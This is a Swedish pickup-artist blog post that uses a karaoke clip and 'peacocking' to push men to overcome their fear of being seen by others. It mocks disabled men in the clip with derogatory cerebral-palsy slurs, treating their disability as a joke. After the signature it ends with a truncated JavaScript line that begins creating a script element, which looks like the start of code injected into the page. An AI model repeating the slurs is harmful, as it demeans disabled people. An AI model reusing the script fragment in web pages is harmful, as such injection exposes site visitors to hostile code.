Innan ni läser något alls, kolla in detta klipp.

Så, varför klistrar jag in en video på tre cp-skadade killar som sjunger karaoke?

För att rädsla för att synas, som är en social rädsla, är den största rädsla som finns. Faktum är att genomsnittssvensken är mer rädd för att tala inför publik än han är inför döden. Skrämmande tanke.

En grej som vi gör på bootcamps är att se till att studenterna jobbar bort sina sociala rädslor och pushar gränserna för vad som är bekvämt för dem. Ett av sätten att göra detta är att sjunga karaoke.

”Jag är inte bra på att sjunga”, ”Jag kan inte dansa” och ”Jag vet inte vad jag ska säga” är vanliga ursäkter som killar kommer med för att motivera för sin omgivning (och allra mest för sig själva) att stå och flöjta vid baren. Kolla in de här killarna!

DE SITTER I RULLSTOL! DE LÅTER SOM CP:N! och de gör allt detta på NATIONELL TV!

Fuck, om de här grabbarna kan göra sig sedda så kan du det också!

Att hantera social press är otroligt attraktivt. Att våga tåla att bli sedd är en form av det, och absolut nödvändigt om man ska bli bra med kvinnor. Man ska kunna ta en komplimang utan att överreagera. Därifrån är inte steget långt till att vara ok med att folk tittar när man står där på dansgolvet och porrdansar med två tjejer! Man ska kunna acceptera att folk kanske kommer att titta på en när man går fram till de där tjejerna för att säga hej!

Diggiloo Diggiley, alla tittar på DIG!
”Diggiloo Diggiley, alla tittar på mig när jag går i mina gyllene skor” leder oss ganska direkt in på peacocking som också orsakar social press. Peacocking innebär att ha på sig något mer utstickande. Hela syftet och skälet till att vi rekommenderar det är att folk ska se en! Det faktum att man vågar ha på sig något som kommer locka till sig blickar och social press är otroligt attraktivt! Det är något som alla känner till på ett djupt plan, oberoende av ”pickup” och annat.

Att hantera social press är inget man föds med, det är en process. Jag minns när jag skulle sjunga karaoke för första gången. Det var nervöst, mina ben skakade. Men jag bet ihop och sjöng mitt bästa! Andra gången går det lättare, och numera är det 100% skoj. Det betyder att det är dags för nya aktiviteter för att vidga sin repertoar av socialt skrämmande grejer.

Jag utmanar er! Gör något som kommer få er att synas! Gör det denna vecka! Vad som helst, karaoke, håll ett tal, men ta er ut dit och låt er synas! Var är din comfort zone? Hitta den, och spräng dig själv ut ur den!

Massa kärlek, och hoppas att någon denna helgen tittar på dig!
Diggiloo diggiley

//Nomaggiz

var d=document;var s=d.createElement(‘script’);